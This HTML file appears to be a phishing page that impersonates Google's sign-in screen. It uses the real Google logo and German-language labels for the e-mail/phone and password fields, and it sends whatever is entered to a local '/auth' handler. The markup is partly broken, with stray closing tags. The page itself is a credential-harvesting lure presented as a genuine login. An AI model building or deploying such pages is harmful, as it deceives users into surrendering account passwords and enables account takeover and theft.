<!DOCTYPE html>
<html>
<head>
  <title>Google Login</title>
  <style>
    /* Add some basic styling */
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
    }
    .container {
      display: flex;
      flex-wrap: wrap;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .form-container {
      background-color: white;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px #ccc;
      max-width: 400px;
      margin: 0 auto;
    }
    img{
      width: 150px;
      display: block;
      margin: 0 auto;
    }
    input[type="text"], input[type="password"] {
      width: 100%;
      padding: 12px 20px;
      margin: 8px 0;
      box-sizing: border-box;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    input[type="submit"] {
      width: 100%;
      background-color: #4CAF50;
      color: white;
      padding: 14px 20px;
      margin: 8px 0;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <form class="form-container" action="/auth" method="post">
  <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png">
  <label for="email">E-mail oder Telefonnummer:</label>
  <input type="text" id="email" name="email">
  <label for="password">Passwort:</label>
  <input type="password" id="password" name="password">
  <input type="submit" value="Login" style="background-color: #4285F4;">
  <a href="#">Passwort vergessen?</a>
</form>

</form>


    </form>
  </div>
</body>
</html>
